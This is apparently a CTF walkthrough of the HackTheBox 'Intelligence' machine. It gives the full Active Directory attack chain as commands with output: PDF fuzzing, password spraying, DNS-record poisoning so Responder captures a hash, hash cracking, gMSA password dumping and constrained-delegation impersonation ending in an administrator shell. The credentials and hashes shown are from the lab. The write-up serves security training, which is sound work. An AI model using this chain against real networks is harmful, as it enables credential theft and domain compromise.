In this walk through, we will be going through the Intelligence room from HackTheBox. This room is rated as Medium on the platform and it consists of password spraying of credentials captured from the internal PDF document. For privilege escalation, abuse of group managed service account privilege is used to perform constrained delegation attack which is used to access the DC and get root. So, let’s get started without any delay.
Table of Contents
Machine Info:
Title | Intelligence |
IPaddress | 10.10.10.248 |
Difficulty | Medium |
OS | Windows |
Description | Intelligence is a medium difficulty Windows machine in which we get initial foothold on the target by leveraging the credentials found in a internal PDF documents. For privilege escalation, a schedule Powershell script was abused to get the hash of the second user. This user is allowed to read the password of a group managed service account, which in turn has constrained delegation access to the DC. |
Enumeration:
- I started off with a regular nmap scan with Aggressive detection and found multiple ports opened as expected from a Windows machine. The key ports that was identified were – 80 (HTTP), 88 (Kerberos), 135 (RPC), 139,445 (SMB), 389,636 (LDAP/LDAPS).
$ sudo nmap -A 10.10.10.248 [sudo] password for wh1terose: Starting Nmap 7.80 ( https://nmap.org ) at 2023-12-14 23:00 IST sendto in send_ip_packet_sd: sendto(5, packet, 44, 0, 10.10.10.248, 16) => Operation not permitted Offending packet: TCP 10.10.14.24:54402 > 10.10.10.248:53 S ttl=50 id=14929 iplen=44 seq=1595588214 win=1024 <mss 1460> sendto in send_ip_packet_sd: sendto(5, packet, 44, 0, 10.10.10.248, 16) => Operation not permitted Offending packet: TCP 10.10.14.24:54403 > 10.10.10.248:53 S ttl=47 id=31369 iplen=44 seq=1595653751 win=1024 <mss 1460> Nmap scan report for 10.10.10.248 Host is up (0.18s latency). Not shown: 989 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Intelligence 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-12-15 01:30:40Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=dc.intelligence.htb | Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb | Not valid before: 2023-12-14T17:29:11 |_Not valid after: 2024-12-13T17:29:11 |_ssl-date: 2023-12-15T01:32:10+00:00; +8h00m00s from scanner time. 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=dc.intelligence.htb | Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb | Not valid before: 2023-12-14T17:29:11 |_Not valid after: 2024-12-13T17:29:11 |_ssl-date: 2023-12-15T01:32:10+00:00; +8h00m00s from scanner time. 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=dc.intelligence.htb | Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb | Not valid before: 2023-12-14T17:29:11 |_Not valid after: 2024-12-13T17:29:11 |_ssl-date: 2023-12-15T01:32:10+00:00; +8h00m00s from scanner time. 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=dc.intelligence.htb | Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb | Not valid before: 2023-12-14T17:29:11 |_Not valid after: 2024-12-13T17:29:11 |_ssl-date: 2023-12-15T01:32:10+00:00; +8h00m00s from scanner time. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port OS fingerprint not ideal because: Missing a closed TCP port so results incomplete No OS matches for host Network Distance: 2 hops Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 7h59m59s, deviation: 0s, median: 7h59m59s | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2023-12-15T01:31:30 |_ start_date: N/A TRACEROUTE (using port 135/tcp) HOP RTT ADDRESS 1 181.16 ms 10.10.14.1 2 182.50 ms 10.10.10.248 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 107.77 seconds
- Also performed a full port scan and found bunch of more ports. One that may be useful was 5985 (WinRM).
sudo nmap -sS -p- -T5 10.10.10.248
- Added the host names to my /etc/hosts file.
- Tried to enumerate some usernames using RPC and LDAP but found nothing.
- Next, enumerated the web server running on port 80 and found a static website running.
- One thing that caught my attention was the PDF document files in Announcement Document section.
- Found some sample text inside it. Nothing useful.
- Fired up gobuster on to the server to reveal some juicy directories. Found only one hit at /documents which we cannot access directly.
gobuster dir -u http://intelligence.htb/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
- Going back to the PDF files, i looked at the URL carefully and i seems like the PDF files are uploaded as per the dates and named after it also. I changed some variable in the date and got a hit. That means, we can fuzz the application for the available PDF files.
http://intelligence.htb/documents/2020-01-02-upload.pdf
- Generated a list of dates for year 2020.
Fuzzing the application for PDF files
- Next, used ffuf to fuzz the application for the PDF files and got a lot of hits.
$ ffuf -u http://intelligence.htb/documents/FUZZ-upload.pdf -w dates.txt /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.1.0-dev ________________________________________________ :: Method : GET :: URL : http://intelligence.htb/documents/FUZZ-upload.pdf :: Wordlist : FUZZ: /home/wh1terose/CTF/HTB/machines/Intelligence/dates.txt :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 ________________________________________________ 2020-01-22 [Status: 200, Size: 28637, Words: 236, Lines: 224, Duration: 907ms] 2020-01-02 [Status: 200, Size: 27002, Words: 229, Lines: 199, Duration: 179ms] -- snipped -- 2020-12-30 [Status: 200, Size: 25109, Words: 218, Lines: 191, Duration: 179ms] :: Progress: [366/366] :: Job [1/1] :: 87 req/sec :: Duration: [0:00:05] :: Errors: 0 ::
- Found a message regarding Internal IT Update which talks about a script that is developed by user Ted in order to notify the teams regarding any outages or attacks.
http://intelligence.htb/documents/2020-12-30-upload.pdf
- Meanwhile, i also tried to enumerate some shares using smbclient but found nothing.
- I downloaded the file containing the note to my local machine.
wget http://intelligence.htb/documents/2020-12-30-upload.pdf
- Looked inside its metadata and found the Creator name – Jason.Patterson.
exiftool 2020-12-30-upload.pdf
- I generated a list again for dates including year 2020 and 2021 and got many successful hits. Next, we have to download them in order to get atleast some potential usernames.
- Used the below commands to make the URL as per our requirement.
cut -d " " -f 1 files.txt > final.txt head final.txt
sed -e 's/$/-upload.pdf/' -i final.txt
awk '$0="http://intelligence.htb/documents/"$0' final.txt > pdflist.txt
- Downloaded all the PDF file to my local machine using wget.
wget -i pdflist.txt
- Found a default Account password in one of the PDF files – NewIntelligenceCorpUser9876.
- Next, i used metaforge to extract all the meta data from the PDF files and save it in one location.
python3 ~/Tools/Metaforge/metaforge.py
- Used below Linux-fu to get the usernames from all the captured metadata.
grep Creator *-upload.pdf.json | cut -d ":" -f 4 | tr "," " " | tr -d '"' > usernames.txt
- Performed a password spray on the usernames list we generated with the default password. Got a hit for – Tiffany.Molina.
$ crackmapexec smb 10.10.10.248 -u usernames.txt -p 'NewIntelligenceCorpUser9876' SMB 10.10.10.248 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False) SMB 10.10.10.248 445 DC [-] intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] STATUS_LOGON_FAILURE -- snipped -- SMB 10.10.10.248 445 DC [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876
Tiffany.Molina: NewIntelligenceCorpUser9876
- Tried to get shell access with user Tiffany.Molina but was denied.
Initial Access:
- Next, checked the SMB permissions for the user and found an interesting directory – Users.
smbmap -H 10.10.10.248 -u Tiffany.Molina -p NewIntelligenceCorpUser9876
- Got access to the Users share and captured the user flag.
$ smbclient //10.10.10.248/Users --user Tiffany.Molina --password NewIntelligenceCorpUser9876 Try "help" to get a list of possible commands. smb: \> ls . DR 0 Mon Apr 19 06:50:26 2021 .. DR 0 Mon Apr 19 06:50:26 2021 Administrator D 0 Mon Apr 19 05:48:39 2021 All Users DHSrn 0 Sat Sep 15 12:51:46 2018 Default DHR 0 Mon Apr 19 07:47:40 2021 Default User DHSrn 0 Sat Sep 15 12:51:46 2018 desktop.ini AHS 174 Sat Sep 15 12:41:27 2018 Public DR 0 Mon Apr 19 05:48:39 2021 Ted.Graves D 0 Mon Apr 19 06:50:26 2021 Tiffany.Molina D 0 Mon Apr 19 06:21:46 2021 3770367 blocks of size 4096. 1405400 blocks available smb: \> cd Tiffany.Molina\ smb: \Tiffany.Molina\> ls . D 0 Mon Apr 19 06:21:46 2021 .. D 0 Mon Apr 19 06:21:46 2021 AppData DH 0 Mon Apr 19 06:21:46 2021 Application Data DHSrn 0 Mon Apr 19 06:21:46 2021 Cookies DHSrn 0 Mon Apr 19 06:21:46 2021 Desktop DR 0 Mon Apr 19 06:21:46 2021 Documents DR 0 Mon Apr 19 06:21:46 2021 Downloads DR 0 Sat Sep 15 12:42:33 2018 Favorites DR 0 Sat Sep 15 12:42:33 2018 Links DR 0 Sat Sep 15 12:42:33 2018 Local Settings DHSrn 0 Mon Apr 19 06:21:46 2021 Music DR 0 Sat Sep 15 12:42:33 2018 My Documents DHSrn 0 Mon Apr 19 06:21:46 2021 NetHood DHSrn 0 Mon Apr 19 06:21:46 2021 NTUSER.DAT AHn 131072 Thu Dec 14 15:19:09 2023 ntuser.dat.LOG1 AHS 86016 Mon Apr 19 06:21:46 2021 ntuser.dat.LOG2 AHS 0 Mon Apr 19 06:21:46 2021 NTUSER.DAT{6392777f-a0b5-11eb-ae6e-000c2908ad93}.TM.blf AHS 65536 Mon Apr 19 06:21:46 2021 NTUSER.DAT{6392777f-a0b5-11eb-ae6e-000c2908ad93}.TMContainer00000000000000000001.regtrans-ms AHS 524288 Mon Apr 19 06:21:46 2021 NTUSER.DAT{6392777f-a0b5-11eb-ae6e-000c2908ad93}.TMContainer00000000000000000002.regtrans-ms AHS 524288 Mon Apr 19 06:21:46 2021 ntuser.ini AHS 20 Mon Apr 19 06:21:46 2021 Pictures DR 0 Sat Sep 15 12:42:33 2018 Recent DHSrn 0 Mon Apr 19 06:21:46 2021 Saved Games D 0 Sat Sep 15 12:42:33 2018 SendTo DHSrn 0 Mon Apr 19 06:21:46 2021 Start Menu DHSrn 0 Mon Apr 19 06:21:46 2021 Templates DHSrn 0 Mon Apr 19 06:21:46 2021 Videos DR 0 Sat Sep 15 12:42:33 2018 3770367 blocks of size 4096. 1405400 blocks available smb: \Tiffany.Molina\> cd Desktop smb: \Tiffany.Molina\Desktop\> ls . DR 0 Mon Apr 19 06:21:46 2021 .. DR 0 Mon Apr 19 06:21:46 2021 user.txt AR 34 Thu Dec 14 15:09:41 2023 3770367 blocks of size 4096. 1405400 blocks available smb: \Tiffany.Molina\Desktop\> get user.txt getting file \Tiffany.Molina\Desktop\user.txt of size 34 as user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec) smb: \Tiffany.Molina\Desktop\> exit
- Another interesting share that holds yet another interesting file was – IT. Got access inside it and downloaded the powershell script named downdetector.ps1.
smbclient //10.10.10.248/IT --user Tiffany.Molina --password NewIntelligenceCorpUser9876 get downdetector.ps1
- Looked inside the downdetector script and found that it is the same script that user Ted has set up as per the notes. The script is checking for any DNS records starting from web and then using Ted creds using -UserDefaultCredentials to send an email to Ted notifying the potential attack.
cat downdetector.ps1
Lateral Movement:
- We can take advantage of this and capture user Ted’s NTLM hash via Responder. For that, we have to set up a fake DNS record starting with string “Web” and which resolves to our Responder listener IP. Once the script checks the newly configured DNS record, it will send a alert using Ted’s creds and at that time, we will be able to capture the hash. I used dnstool to add a DNS record.
python3 dnstool.py -u intelligence\\Tiffany.Molina -p NewIntelligenceCorpUser9876 --action add --record webfake --data 10.10.14.17 10.10.10.248
- Set up responder for the attack. Within 5 minutes, i was blessed with the NTLMV2 hash of user Ted.Graves.
sudo responder -I tun0 -v
Ted.Graves::intelligence:b1cfe264a50ed5c7:B2C10F808E9EFC93C238CDBAF1D3DE85:0101000000000000CC594EFAB82FDA018303CE6123B8DDDB0000000002000800570036004F00510001001E00570049004E002D00420050005400470043004A004D00340030004400590004001400570036004F0051002E004C004F00430041004C0003003400570049004E002D00420050005400470043004A004D0034003000440059002E00570036004F0051002E004C004F00430041004C0005001400570036004F0051002E004C004F00430041004C0008003000300000000000000000000000002000002003AAB437CFF3C3635772FB56BADB1F7B83CA2EB3A9528EB46F5F34FDBA37650A0010000000000000000000000000000000000009003A0048005400540050002F00770065006200660061006B0065002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000
- Cracked the hash using hashcat and got the password.
sudo hashcat -m 5600 hash.txt /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -O
TED.GRAVES: Mr.Teddy
- Next, using the found credentials used Bloodhound.py in order to retrieve information from the domain.
$ bloodhound-python -c all -u Ted.Graves -p Mr.Teddy -d intelligence.htb -dc intelligence.htb -gc intelligence.htb INFO: Getting TGT for user WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great) INFO: Connecting to LDAP server: intelligence.htb INFO: Found 1 domains INFO: Found 1 domains in the forest INFO: Found 1 computers INFO: Connecting to GC LDAP server: intelligence.htb INFO: Connecting to LDAP server: intelligence.htb INFO: Found 43 users INFO: Found 55 groups INFO: Found 2 gpos INFO: Found 1 ous INFO: Found 19 containers INFO: Found 0 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: dc.intelligence.htb INFO: Done in 00M 53S
- Uploaded the data to Bloodhound and looked for the “Shortest Path to Domain Admins”. The path shows that we can get access to user SVC_INT, then we will be allowed to delegate to the DC. We can access SVC_INT from our current owned user via ITSUPPORT group as it has ReadGMSAPassword permissions set to it.
- I looked into the help for the vulnerability and got to know that we can abuse it using gMSADumper tool.
- I used the same and dumped the hash for user svc_backup.
python3 ~/Tools/gMSADumper/gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb
svc_int$:::d4a0554f26a9f3df13720481e07e0a3f
Privilege Escalation:
- Next, i performed Constrained delegation attack from svc_backup on DC to impersonate as Administrator and get a TGT for it.
sudo ntpdate 10.10.10.248 getST.py -dc-ip 10.10.10.248 -spn www/dc.intelligence.htb -hashes :d4a0554f26a9f3df13720481e07e0a3f -impersonate administrator intelligence.htb/svc_int export KRB5CCNAME=administrator.ccache
- Used the dumped TGT to get shell access on the target using psexec as Administrator.
psexec.py -k -no-pass dc.intelligence.htb
- Finally captured the root flag and completed the room.
Also Read: HTB – Flight
Conclusion:
So that was “Intelligence” for you. The machine features a Windows machine that showcases a number of common attacks in an Active Directory environment. After retrieving internal PDF documents stored on the web server (by brute-forcing a common naming scheme) and inspecting their contents and metadata, which reveal a default password and a list of potential AD users. Then we performed password spraying which leads to the discovery of a valid user account, granting us initial foothold on the system. Post that, A scheduled PowerShell script that sends authenticated requests to web servers based on their hostname was discovered. So, by adding a custom DNS record, it was possible for us to force a request that can be intercepted to capture the hash of a second user, which was easily crackable. This user was allowed to read the password of a group managed service account, which in turn has constrained delegation access to the domain controller, resulting in a shell with administrative privileges. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.